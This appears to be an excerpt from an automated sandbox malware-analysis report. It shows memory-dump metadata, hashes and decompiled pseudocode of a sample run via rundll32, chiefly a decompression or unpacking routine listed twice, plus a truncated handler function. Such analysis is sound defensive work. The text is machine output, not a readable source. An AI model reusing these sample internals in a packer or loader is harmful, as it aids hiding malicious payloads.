                0x04b987e0
                0x04b987e0
                0x04b987e9
                0x04b987ea
                0x04b987ec
                0x04b987ee
                0x04b987ee
                0x00000000
                0x04b987e0
                0x04b987de
                0x04b987ba
                0x04b987c1
                0x04b987c1
                0x04b987c3
                0x00000000
                0x00000000
                0x04b987c5
                0x04b987c6
                0x04b987c9
                0x04b987cb
                0x00000000
                0x00000000
                0x00000000
                0x04b987cb
                0x00000000
                0x04b987c1
                0x04b98744
                0x04b98747
                0x04b9874c
                0x00000000
                0x00000000
                0x04b98755
                0x04b98757
                0x04b9875d
                0x00000000
                0x00000000
                0x04b98763
                0x04b98769
                0x00000000
                0x00000000
                0x04b9876f
                0x04b98771
                0x04b9877a
                0x04b9877e
                0x00000000
                0x00000000
                0x04b98784
                0x04b98787
                0x04b98789
                0x00000000
                0x00000000
                0x04b98790
                0x04b98792
                0x00000000
                0x00000000
                0x04b98794
                0x04b98798
                0x00000000
                0x00000000
                0x00000000
                0x04b98798
                0x00000000
                0x00000000
                0x00000000
                0x04b98683
                0x04b98683
                0x04b98683
                0x04b9868a
                0x00000000
                0x00000000
                0x04b9868c
                0x04b9868d
                0x04b9868f
                0x00000000
                0x00000000
                0x00000000
                0x04b9868f
                0x04b986b7
                0x04b986b9
                0x00000000
                0x00000000
                0x04b986c9
                0x04b986cb
                0x04b986cd
                0x00000000
                0x00000000
                0x04b986d3
                0x04b986da
                0x04b98706
                0x04b98706
                0x04b98708
                0x04b9870a
                0x04b9871e
                0x04b98720
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x04b9870c
                0x04b9870c
                0x04b9870c
                0x04b98715
                0x04b98716
                0x04b98718
                0x04b9871a
                0x04b9871a
                0x00000000
                0x04b9870c
                0x04b986dc
                0x04b986dc
                0x04b986df
                0x04b986e1
                0x04b986f3
                0x04b986f3
                0x04b986f6
                0x04b986f8
                0x04b986f8
                0x04b986f9
                0x04b986f9
                0x04b986ff
                0x04b986ff
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x04b986e3
                0x04b986e3
                0x04b986e3
                0x04b986ea
                0x00000000
                0x00000000
                0x04b986ec
                0x04b986ec
                0x04b986ed
                0x00000000
                0x00000000
                0x00000000
                0x04b986ed
                0x04b986ef
                0x04b986f1
                0x04b98704
                0x00000000
                0x00000000
                0x00000000
                0x04b98704
                0x00000000
                0x04b986f1
                0x04b98663
                0x04b98666
                0x04b98669
                0x00000000
                0x00000000
                0x04b9866b
                0x04b9866d
                0x00000000
                0x00000000
                0x00000000
                0x04b9866d
                0x04b98632
                0x04b98634
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04B986A2
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID:
                • API String ID: 2850889275-0
                • Opcode ID: 9529fc129334043760c1193efc921505f5e510153446b8771e56fb3231083c44
                • Instruction ID: 49bbad17ebf2a9d6c0abec367f9f98aa87a787ca901112ac155602f98c87a51c
                • Opcode Fuzzy Hash: 9529fc129334043760c1193efc921505f5e510153446b8771e56fb3231083c44
                • Instruction Fuzzy Hash: FB6192316246429BDF29EF29C59066973E2FB87398B2489F9D846CF290E735FC41C650
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401E2A Relevance: .3, Instructions: 301COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 93%
                			E00401E2A(intOrPtr* __eax, char* _a4) {
				unsigned int _v12;
				unsigned int _v16;
				char* _v20;
				signed int _v24;
				char _v32;
				signed char* _v40;
				signed int _t185;
				signed int _t195;
				intOrPtr* _t197;
				intOrPtr* _t208;
				void* _t220;
				intOrPtr* _t222;
				char* _t227;
				void* _t234;
				char* _t237;
				signed int _t239;
				signed int _t241;
				signed int _t244;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t254;
				char _t256;
				signed int _t257;
				signed int _t259;
				char _t261;
				signed int _t262;
				char _t266;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				unsigned int _t273;
				signed int _t275;
				void* _t276;
				void* _t277;
				signed int _t279;
				signed int _t280;
				unsigned int _t282;
				unsigned int _t283;
				void* _t284;

				_t237 = _a4;
				_t270 = 0;
				_t277 = 0;
				 *_t237 =  *((intOrPtr*)(__eax));
				_t234 = 8;
				_v20 = _t237 + 1;
				_v12 = 0;
				_v32 = 0;
				_v16 = 0;
				_v40 = __eax + 1;
				_t7 = _t234 + 0x78; // 0x80
				_t239 = _t7;
				do {
					_t8 =  &_v32;
					 *_t8 = _v32 - 1;
					asm("bt dword [eax], 0x1f");
					if( *_t8 >= 0) {
						_t241 = _v24;
					} else {
						_v40 =  &(_v40[1]);
						_t241 =  *_v40 & 0x000000ff;
						_v32 = _v32 + _t234;
					}
					_v24 = _t241 + _t241;
					if((_t241 & _t239 & 0xffffff80) == 0) {
						_v20 = _v20 + 1;
						_v40 =  &(_v40[1]);
						 *_v20 =  *_v40;
						goto L74;
					} else {
						_t20 =  &_v32;
						 *_t20 = _v32 - 1;
						asm("bt dword [eax], 0x1f");
						if( *_t20 >= 0) {
							_t244 = _v24;
						} else {
							_v40 =  &(_v40[1]);
							_t244 =  *_v40 & 0x000000ff;
							_v32 = _v32 + _t234;
						}
						_v24 = _t244 + _t244;
						if((_t244 & _t239 & 0xffffff80) == 0) {
							_t272 = 1;
							do {
								_t69 =  &_v32;
								 *_t69 = _v32 - 1;
								asm("bt dword [eax], 0x1f");
								if( *_t69 >= 0) {
									_t246 = _v24;
								} else {
									_v40 =  &(_v40[1]);
									_t246 =  *_v40 & 0x000000ff;
									_v32 = _v32 + _t234;
								}
								_t78 =  &_v32;
								 *_t78 = _v32 - 1;
								_t272 = ((_t246 & _t239) >> 7) + _t272 * 2;
								_v24 = _t246 + _t246;
								asm("bt dword [eax], 0x1f");
								if( *_t78 >= 0) {
									_t248 = _v24;
								} else {
									_v40 =  &(_v40[1]);
									_t248 =  *_v40 & 0x000000ff;
									_v32 = _v32 + _t234;
								}
								_v24 = _t248 + _t248;
							} while ((_t248 & _t239 & 0xffffff80) != 0);
							if(_t277 != 0) {
								_t123 = _t272 - 2; // -1
								_t185 = _t123;
								goto L53;
							} else {
								if(_t272 != 2) {
									_t122 = _t272 - 3; // -2
									_t185 = _t122;
									L53:
									_v40 =  &(_v40[1]);
									_t273 = (_t185 << 8) + ( *_v40 & 0x000000ff);
									_t279 = 1;
									do {
										_t127 =  &_v32;
										 *_t127 = _v32 - 1;
										asm("bt dword [eax], 0x1f");
										if( *_t127 >= 0) {
											_t252 = _v24;
										} else {
											_v40 =  &(_v40[1]);
											_t252 =  *_v40 & 0x000000ff;
											_v32 = _v32 + _t234;
										}
										_t136 =  &_v32;
										 *_t136 = _v32 - 1;
										_t279 = ((_t252 & _t239) >> 7) + _t279 * 2;
										_v24 = _t252 + _t252;
										asm("bt dword [eax], 0x1f");
										if( *_t136 >= 0) {
											_t254 = _v24;
										} else {
											_v40 =  &(_v40[1]);
											_t254 =  *_v40 & 0x000000ff;
											_v32 = _v32 + _t234;
										}
										_v24 = _t254 + _t254;
									} while ((_t254 & _t239 & 0xffffff80) != 0);
									_t195 = _t279;
									if(_t273 < _t239) {
										_t151 = _t279 + 2; // 0x3
										_t195 = _t151;
									}
									if(_t273 >= 0x7d00) {
										_t195 = _t195 + 1;
									}
									if(_t273 >= 0x500) {
										_t195 = _t195 + 1;
									}
									_t280 = _t195;
									if(_t195 != 0) {
										_t197 = _v20 - _t273;
										do {
											_t256 =  *_t197;
											_v20 = _v20 + 1;
											_t197 = _t197 + 1;
											_t280 = _t280 - 1;
											 *_v20 = _t256;
										} while (_t280 != 0);
										_t234 = 8;
									}
									_v12 = _t273;
								} else {
									_t275 = 1;
									do {
										_t93 =  &_v32;
										 *_t93 = _v32 - 1;
										asm("bt dword [eax], 0x1f");
										if( *_t93 >= 0) {
											_t257 = _v24;
										} else {
											_v40 =  &(_v40[1]);
											_t257 =  *_v40 & 0x000000ff;
											_v32 = _v32 + _t234;
										}
										_t102 =  &_v32;
										 *_t102 = _v32 - 1;
										_t275 = ((_t257 & _t239) >> 7) + _t275 * 2;
										_v24 = _t257 + _t257;
										asm("bt dword [eax], 0x1f");
										if( *_t102 >= 0) {
											_t259 = _v24;
										} else {
											_v40 =  &(_v40[1]);
											_t259 =  *_v40 & 0x000000ff;
											_v32 = _v32 + _t234;
										}
										_v24 = _t259 + _t259;
									} while ((_t259 & _t239 & 0xffffff80) != 0);
									if(_t275 != 0) {
										_t208 = _v20 - _v12;
										do {
											_t261 =  *_t208;
											_v20 = _v20 + 1;
											_t208 = _t208 + 1;
											_t275 = _t275 - 1;
											 *_v20 = _t261;
										} while (_t275 != 0);
									}
								}
							}
							goto L72;
						} else {
							_t32 =  &_v32;
							 *_t32 = _v32 - 1;
							asm("bt dword [eax], 0x1f");
							if( *_t32 >= 0) {
								_t262 = _v24;
							} else {
								_v40 =  &(_v40[1]);
								_t262 =  *_v40 & 0x000000ff;
								_v32 = _v32 + _t234;
							}
							_v24 = _t262 + _t262;
							if((_t262 & _t239 & 0xffffff80) == 0) {
								_t282 =  *_v40 & 0x000000ff;
								_v40 =  &(_v40[1]);
								_t220 = (_t282 & 1) + 2;
								_t283 = _t282 >> 1;
								if(_t283 == 0) {
									_v16 = 1;
								} else {
									_t276 = _t220;
									if(_t220 != 0) {
										_t222 = _v20 - _t283;
										do {
											_t266 =  *_t222;
											_v20 = _v20 + 1;
											_t222 = _t222 + 1;
											_t276 = _t276 - 1;
											 *_v20 = _t266;
										} while (_t276 != 0);
										_t234 = 8;
									}
								}
								_v12 = _t283;
								L72:
								_t277 = 1;
							} else {
								_t284 = 4;
								do {
									_t44 =  &_v32;
									 *_t44 = _v32 - 1;
									asm("bt dword [eax], 0x1f");
									if( *_t44 >= 0) {
										_t267 = _v24;
									} else {
										_v40 =  &(_v40[1]);
										_t267 =  *_v40 & 0x000000ff;
										_v32 = _v32 + _t234;
									}
									_t284 = _t284 - 1;
									_v24 = _t267 + _t267;
									_t270 = ((_t267 & _t239) >> 7) + _t270 * 2;
								} while (_t284 != 0);
								_t227 = _v20;
								if(_t270 == 0) {
									 *_t227 = 0;
								} else {
									 *_v20 =  *((intOrPtr*)(_t227 - _t270));
								}
								_v20 = _v20 + 1;
								L74:
								_t277 = 0;
							}
						}
					}
					_t270 = 0;
				} while (_v16 == 0);
				return _v20 - _a4;
			}











































                0x00401e32
                0x00401e38
                0x00401e3a
                0x00401e3c
                0x00401e42
                0x00401e43
                0x00401e46
                0x00401e49
                0x00401e4c
                0x00401e4f
                0x00401e52
                0x00401e52
                0x00401e55
                0x00401e55
                0x00401e55
                0x00401e5b
                0x00401e5f
                0x00401e6f
                0x00401e61
                0x00401e64
                0x00401e67
                0x00401e6a
                0x00401e6a
                0x00401e78
                0x00401e80
                0x00402113
                0x00402116
                0x00402119
                0x00000000
                0x00401e86
                0x00401e86
                0x00401e86
                0x00401e8c
                0x00401e90
                0x00401ea0
                0x00401e92
                0x00401e95
                0x00401e98
                0x00401e9b
                0x00401e9b
                0x00401ea9
                0x00401eb1
                0x00401f74
                0x00401f75
                0x00401f75
                0x00401f75
                0x00401f7b
                0x00401f7f
                0x00401f8f
                0x00401f81
                0x00401f84
                0x00401f87
                0x00401f8a
                0x00401f8a
                0x00401f9b
                0x00401f9b
                0x00401f9e
                0x00401fa4
                0x00401fa7
                0x00401fab
                0x00401fbb
                0x00401fad
                0x00401fb0
                0x00401fb3
                0x00401fb6
                0x00401fb6
                0x00401fc4
                0x00401fc7
                0x00401fd0
                0x0040205d
                0x0040205d
                0x00000000
                0x00401fd6
                0x00401fd9
                0x00402058
                0x00402058
                0x00402060
                0x0040206b
                0x00402070
                0x00402072
                0x00402073
                0x00402073
                0x00402073
                0x00402079
                0x0040207d
                0x0040208d
                0x0040207f
                0x00402082
                0x00402085
                0x00402088
                0x00402088
                0x00402099
                0x00402099
                0x0040209c
                0x004020a2
                0x004020a5
                0x004020a9
                0x004020b9
                0x004020ab
                0x004020ae
                0x004020b1
                0x004020b4
                0x004020b4
                0x004020c2
                0x004020c5
                0x004020cc
                0x004020d0
                0x004020d2
                0x004020d2
                0x004020d2
                0x004020db
                0x004020dd
                0x004020dd
                0x004020e4
                0x004020e6
                0x004020e6
                0x004020e7
                0x004020eb
                0x004020f0
                0x004020f2
                0x004020f5
                0x004020f7
                0x004020fa
                0x004020fb
                0x004020fc
                0x004020fc
                0x00402102
                0x00402102
                0x00402103
                0x00401fdb
                0x00401fdd
                0x00401fde
                0x00401fde
                0x00401fde
                0x00401fe4
                0x00401fe8
                0x00401ff8
                0x00401fea
                0x00401fed
                0x00401ff0
                0x00401ff3
                0x00401ff3
                0x00402004
                0x00402004
                0x00402007
                0x0040200d
                0x00402010
                0x00402014
                0x00402024
                0x00402016
                0x00402019
                0x0040201c
                0x0040201f
                0x0040201f
                0x0040202d
                0x00402030
                0x00402039
                0x00402042
                0x00402045
                0x00402048
                0x0040204a
                0x0040204d
                0x0040204e
                0x0040204f
                0x0040204f
                0x00402053
                0x00402039
                0x00401fd9
                0x00000000
                0x00401eb7
                0x00401eb7
                0x00401eb7
                0x00401ebd
                0x00401ec1
                0x00401ed1
                0x00401ec3
                0x00401ec6
                0x00401ec9
                0x00401ecc
                0x00401ecc
                0x00401eda
                0x00401ee2
                0x00401f36
                0x00401f39
                0x00401f44
                0x00401f45
                0x00401f47
                0x00401f67
                0x00401f49
                0x00401f49
                0x00401f4d
                0x00401f52
                0x00401f54
                0x00401f57
                0x00401f59
                0x00401f5c
                0x00401f5d
                0x00401f5e
                0x00401f5e
                0x00401f64
                0x00401f64
                0x00401f4d
                0x00401f6a
                0x00402106
                0x00402108
                0x00401ee4
                0x00401ee6
                0x00401ee7
                0x00401ee7
                0x00401ee7
                0x00401eed
                0x00401ef1
                0x00401f01
                0x00401ef3
                0x00401ef6
                0x00401ef9
                0x00401efc
                0x00401efc
                0x00401f0d
                0x00401f0e
                0x00401f11
                0x00401f11
                0x00401f16
                0x00401f1b
                0x00401f28
                0x00401f1d
                0x00401f24
                0x00401f24
                0x00401f2b
                0x0040211b
                0x0040211b
                0x0040211b
                0x00401ee2
                0x00401eb1
                0x0040211d
                0x0040211f
                0x00402132

                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6e96288bae5ba7ae6b377d35bcc9b84ab93bb1f3cafbf78226a70a6ca21fd448
                • Instruction ID: 0989effe67a0bb300d0aa8b8e4c5787125b32bb8dafe6a19f9c287dcd43717e7
                • Opcode Fuzzy Hash: 6e96288bae5ba7ae6b377d35bcc9b84ab93bb1f3cafbf78226a70a6ca21fd448
                • Instruction Fuzzy Hash: 24C14B31D0425A8FCB05CF99C9805FEB7F1EF8A310B1481A7D961BB291C6799E02DFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B92FED Relevance: .3, Instructions: 301COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 93%
                			E04B92FED(intOrPtr* __eax, char* _a4) {
				unsigned int _v12;
				unsigned int _v16;
				char* _v20;
				signed int _v24;
				char _v32;
				signed char* _v40;
				signed int _t185;
				signed int _t195;
				intOrPtr* _t197;
				intOrPtr* _t208;
				void* _t220;
				intOrPtr* _t222;
				char* _t227;
				void* _t234;
				char* _t237;
				signed int _t239;
				signed int _t241;
				signed int _t244;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t254;
				char _t256;
				signed int _t257;
				signed int _t259;
				char _t261;
				signed int _t262;
				char _t266;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				unsigned int _t273;
				signed int _t275;
				void* _t276;
				void* _t277;
				signed int _t279;
				signed int _t280;
				unsigned int _t282;
				unsigned int _t283;
				void* _t284;

				_t237 = _a4;
				_t270 = 0;
				_t277 = 0;
				 *_t237 =  *((intOrPtr*)(__eax));
				_t234 = 8;
				_v20 = _t237 + 1;
				_v12 = 0;
				_v32 = 0;
				_v16 = 0;
				_v40 = __eax + 1;
				_t7 = _t234 + 0x78; // 0x80
				_t239 = _t7;
				do {
					_t8 =  &_v32;
					 *_t8 = _v32 - 1;
					asm("bt dword [eax], 0x1f");
					if( *_t8 >= 0) {
						_t241 = _v24;
					} else {
						_v40 =  &(_v40[1]);
						_t241 =  *_v40 & 0x000000ff;
						_v32 = _v32 + _t234;
					}
					_v24 = _t241 + _t241;
					if((_t241 & _t239 & 0xffffff80) == 0) {
						_v20 = _v20 + 1;
						_v40 =  &(_v40[1]);
						 *_v20 =  *_v40;
						goto L74;
					} else {
						_t20 =  &_v32;
						 *_t20 = _v32 - 1;
						asm("bt dword [eax], 0x1f");
						if( *_t20 >= 0) {
							_t244 = _v24;
						} else {
							_v40 =  &(_v40[1]);
							_t244 =  *_v40 & 0x000000ff;
							_v32 = _v32 + _t234;
						}
						_v24 = _t244 + _t244;
						if((_t244 & _t239 & 0xffffff80) == 0) {
							_t272 = 1;
							do {
								_t69 =  &_v32;
								 *_t69 = _v32 - 1;
								asm("bt dword [eax], 0x1f");
								if( *_t69 >= 0) {
									_t246 = _v24;
								} else {
									_v40 =  &(_v40[1]);
									_t246 =  *_v40 & 0x000000ff;
									_v32 = _v32 + _t234;
								}
								_t78 =  &_v32;
								 *_t78 = _v32 - 1;
								_t272 = ((_t246 & _t239) >> 7) + _t272 * 2;
								_v24 = _t246 + _t246;
								asm("bt dword [eax], 0x1f");
								if( *_t78 >= 0) {
									_t248 = _v24;
								} else {
									_v40 =  &(_v40[1]);
									_t248 =  *_v40 & 0x000000ff;
									_v32 = _v32 + _t234;
								}
								_v24 = _t248 + _t248;
							} while ((_t248 & _t239 & 0xffffff80) != 0);
							if(_t277 != 0) {
								_t123 = _t272 - 2; // -1
								_t185 = _t123;
								goto L53;
							} else {
								if(_t272 != 2) {
									_t122 = _t272 - 3; // -2
									_t185 = _t122;
									L53:
									_v40 =  &(_v40[1]);
									_t273 = (_t185 << 8) + ( *_v40 & 0x000000ff);
									_t279 = 1;
									do {
										_t127 =  &_v32;
										 *_t127 = _v32 - 1;
										asm("bt dword [eax], 0x1f");
										if( *_t127 >= 0) {
											_t252 = _v24;
										} else {
											_v40 =  &(_v40[1]);
											_t252 =  *_v40 & 0x000000ff;
											_v32 = _v32 + _t234;
										}
										_t136 =  &_v32;
										 *_t136 = _v32 - 1;
										_t279 = ((_t252 & _t239) >> 7) + _t279 * 2;
										_v24 = _t252 + _t252;
										asm("bt dword [eax], 0x1f");
										if( *_t136 >= 0) {
											_t254 = _v24;
										} else {
											_v40 =  &(_v40[1]);
											_t254 =  *_v40 & 0x000000ff;
											_v32 = _v32 + _t234;
										}
										_v24 = _t254 + _t254;
									} while ((_t254 & _t239 & 0xffffff80) != 0);
									_t195 = _t279;
									if(_t273 < _t239) {
										_t151 = _t279 + 2; // 0x3
										_t195 = _t151;
									}
									if(_t273 >= 0x7d00) {
										_t195 = _t195 + 1;
									}
									if(_t273 >= 0x500) {
										_t195 = _t195 + 1;
									}
									_t280 = _t195;
									if(_t195 != 0) {
										_t197 = _v20 - _t273;
										do {
											_t256 =  *_t197;
											_v20 = _v20 + 1;
											_t197 = _t197 + 1;
											_t280 = _t280 - 1;
											 *_v20 = _t256;
										} while (_t280 != 0);
										_t234 = 8;
									}
									_v12 = _t273;
								} else {
									_t275 = 1;
									do {
										_t93 =  &_v32;
										 *_t93 = _v32 - 1;
										asm("bt dword [eax], 0x1f");
										if( *_t93 >= 0) {
											_t257 = _v24;
										} else {
											_v40 =  &(_v40[1]);
											_t257 =  *_v40 & 0x000000ff;
											_v32 = _v32 + _t234;
										}
										_t102 =  &_v32;
										 *_t102 = _v32 - 1;
										_t275 = ((_t257 & _t239) >> 7) + _t275 * 2;
										_v24 = _t257 + _t257;
										asm("bt dword [eax], 0x1f");
										if( *_t102 >= 0) {
											_t259 = _v24;
										} else {
											_v40 =  &(_v40[1]);
											_t259 =  *_v40 & 0x000000ff;
											_v32 = _v32 + _t234;
										}
										_v24 = _t259 + _t259;
									} while ((_t259 & _t239 & 0xffffff80) != 0);
									if(_t275 != 0) {
										_t208 = _v20 - _v12;
										do {
											_t261 =  *_t208;
											_v20 = _v20 + 1;
											_t208 = _t208 + 1;
											_t275 = _t275 - 1;
											 *_v20 = _t261;
										} while (_t275 != 0);
									}
								}
							}
							goto L72;
						} else {
							_t32 =  &_v32;
							 *_t32 = _v32 - 1;
							asm("bt dword [eax], 0x1f");
							if( *_t32 >= 0) {
								_t262 = _v24;
							} else {
								_v40 =  &(_v40[1]);
								_t262 =  *_v40 & 0x000000ff;
								_v32 = _v32 + _t234;
							}
							_v24 = _t262 + _t262;
							if((_t262 & _t239 & 0xffffff80) == 0) {
								_t282 =  *_v40 & 0x000000ff;
								_v40 =  &(_v40[1]);
								_t220 = (_t282 & 1) + 2;
								_t283 = _t282 >> 1;
								if(_t283 == 0) {
									_v16 = 1;
								} else {
									_t276 = _t220;
									if(_t220 != 0) {
										_t222 = _v20 - _t283;
										do {
											_t266 =  *_t222;
											_v20 = _v20 + 1;
											_t222 = _t222 + 1;
											_t276 = _t276 - 1;
											 *_v20 = _t266;
										} while (_t276 != 0);
										_t234 = 8;
									}
								}
								_v12 = _t283;
								L72:
								_t277 = 1;
							} else {
								_t284 = 4;
								do {
									_t44 =  &_v32;
									 *_t44 = _v32 - 1;
									asm("bt dword [eax], 0x1f");
									if( *_t44 >= 0) {
										_t267 = _v24;
									} else {
										_v40 =  &(_v40[1]);
										_t267 =  *_v40 & 0x000000ff;
										_v32 = _v32 + _t234;
									}
									_t284 = _t284 - 1;
									_v24 = _t267 + _t267;
									_t270 = ((_t267 & _t239) >> 7) + _t270 * 2;
								} while (_t284 != 0);
								_t227 = _v20;
								if(_t270 == 0) {
									 *_t227 = 0;
								} else {
									 *_v20 =  *((intOrPtr*)(_t227 - _t270));
								}
								_v20 = _v20 + 1;
								L74:
								_t277 = 0;
							}
						}
					}
					_t270 = 0;
				} while (_v16 == 0);
				return _v20 - _a4;
			}











































                0x04b92ff5
                0x04b92ffb
                0x04b92ffd
                0x04b92fff
                0x04b93005
                0x04b93006
                0x04b93009
                0x04b9300c
                0x04b9300f
                0x04b93012
                0x04b93015
                0x04b93015
                0x04b93018
                0x04b93018
                0x04b93018
                0x04b9301e
                0x04b93022
                0x04b93032
                0x04b93024
                0x04b93027
                0x04b9302a
                0x04b9302d
                0x04b9302d
                0x04b9303b
                0x04b93043
                0x04b932d6
                0x04b932d9
                0x04b932dc
                0x00000000
                0x04b93049
                0x04b93049
                0x04b93049
                0x04b9304f
                0x04b93053
                0x04b93063
                0x04b93055
                0x04b93058
                0x04b9305b
                0x04b9305e
                0x04b9305e
                0x04b9306c
                0x04b93074
                0x04b93137
                0x04b93138
                0x04b93138
                0x04b93138
                0x04b9313e
                0x04b93142
                0x04b93152
                0x04b93144
                0x04b93147
                0x04b9314a
                0x04b9314d
                0x04b9314d
                0x04b9315e
                0x04b9315e
                0x04b93161
                0x04b93167
                0x04b9316a
                0x04b9316e
                0x04b9317e
                0x04b93170
                0x04b93173
                0x04b93176
                0x04b93179
                0x04b93179
                0x04b93187
                0x04b9318a
                0x04b93193
                0x04b93220
                0x04b93220
                0x00000000
                0x04b93199
                0x04b9319c
                0x04b9321b
                0x04b9321b
                0x04b93223
                0x04b9322e
                0x04b93233
                0x04b93235
                0x04b93236
                0x04b93236
                0x04b93236
                0x04b9323c
                0x04b93240
                0x04b93250
                0x04b93242
                0x04b93245
                0x04b93248
                0x04b9324b
                0x04b9324b
                0x04b9325c
                0x04b9325c
                0x04b9325f
                0x04b93265
                0x04b93268
                0x04b9326c
                0x04b9327c
                0x04b9326e
                0x04b93271
                0x04b93274
                0x04b93277
                0x04b93277
                0x04b93285
                0x04b93288
                0x04b9328f
                0x04b93293
                0x04b93295
                0x04b93295
                0x04b93295
                0x04b9329e
                0x04b932a0
                0x04b932a0
                0x04b932a7
                0x04b932a9
                0x04b932a9
                0x04b932aa
                0x04b932ae
                0x04b932b3
                0x04b932b5
                0x04b932b8
                0x04b932ba
                0x04b932bd
                0x04b932be
                0x04b932bf
                0x04b932bf
                0x04b932c5
                0x04b932c5
                0x04b932c6
                0x04b9319e
                0x04b931a0
                0x04b931a1
                0x04b931a1
                0x04b931a1
                0x04b931a7
                0x04b931ab
                0x04b931bb
                0x04b931ad
                0x04b931b0
                0x04b931b3
                0x04b931b6
                0x04b931b6
                0x04b931c7
                0x04b931c7
                0x04b931ca
                0x04b931d0
                0x04b931d3
                0x04b931d7
                0x04b931e7
                0x04b931d9
                0x04b931dc
                0x04b931df
                0x04b931e2
                0x04b931e2
                0x04b931f0
                0x04b931f3
                0x04b931fc
                0x04b93205
                0x04b93208
                0x04b9320b
                0x04b9320d
                0x04b93210
                0x04b93211
                0x04b93212
                0x04b93212
                0x04b93216
                0x04b931fc
                0x04b9319c
                0x00000000
                0x04b9307a
                0x04b9307a
                0x04b9307a
                0x04b93080
                0x04b93084
                0x04b93094
                0x04b93086
                0x04b93089
                0x04b9308c
                0x04b9308f
                0x04b9308f
                0x04b9309d
                0x04b930a5
                0x04b930f9
                0x04b930fc
                0x04b93107
                0x04b93108
                0x04b9310a
                0x04b9312a
                0x04b9310c
                0x04b9310c
                0x04b93110
                0x04b93115
                0x04b93117
                0x04b9311a
                0x04b9311c
                0x04b9311f
                0x04b93120
                0x04b93121
                0x04b93121
                0x04b93127
                0x04b93127
                0x04b93110
                0x04b9312d
                0x04b932c9
                0x04b932cb
                0x04b930a7
                0x04b930a9
                0x04b930aa
                0x04b930aa
                0x04b930aa
                0x04b930b0
                0x04b930b4
                0x04b930c4
                0x04b930b6
                0x04b930b9
                0x04b930bc
                0x04b930bf
                0x04b930bf
                0x04b930d0
                0x04b930d1
                0x04b930d4
                0x04b930d4
                0x04b930d9
                0x04b930de
                0x04b930eb
                0x04b930e0
                0x04b930e7
                0x04b930e7
                0x04b930ee
                0x04b932de
                0x04b932de
                0x04b932de
                0x04b930a5
                0x04b93074
                0x04b932e0
                0x04b932e2
                0x04b932f5

                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6e96288bae5ba7ae6b377d35bcc9b84ab93bb1f3cafbf78226a70a6ca21fd448
                • Instruction ID: 44b07584e8ac5682434bb92496721966e7890af99fa400069126c1710d39109d
                • Opcode Fuzzy Hash: 6e96288bae5ba7ae6b377d35bcc9b84ab93bb1f3cafbf78226a70a6ca21fd448
                • Instruction Fuzzy Hash: 2AC14C31E0415A8FCF09CF99C8815FEB7F1EF89310B1895A6D861B7255D639AE02DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402344 Relevance: .1, Instructions: 77COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 71%
                			E00402344(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E004024AB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00402565(_t66);
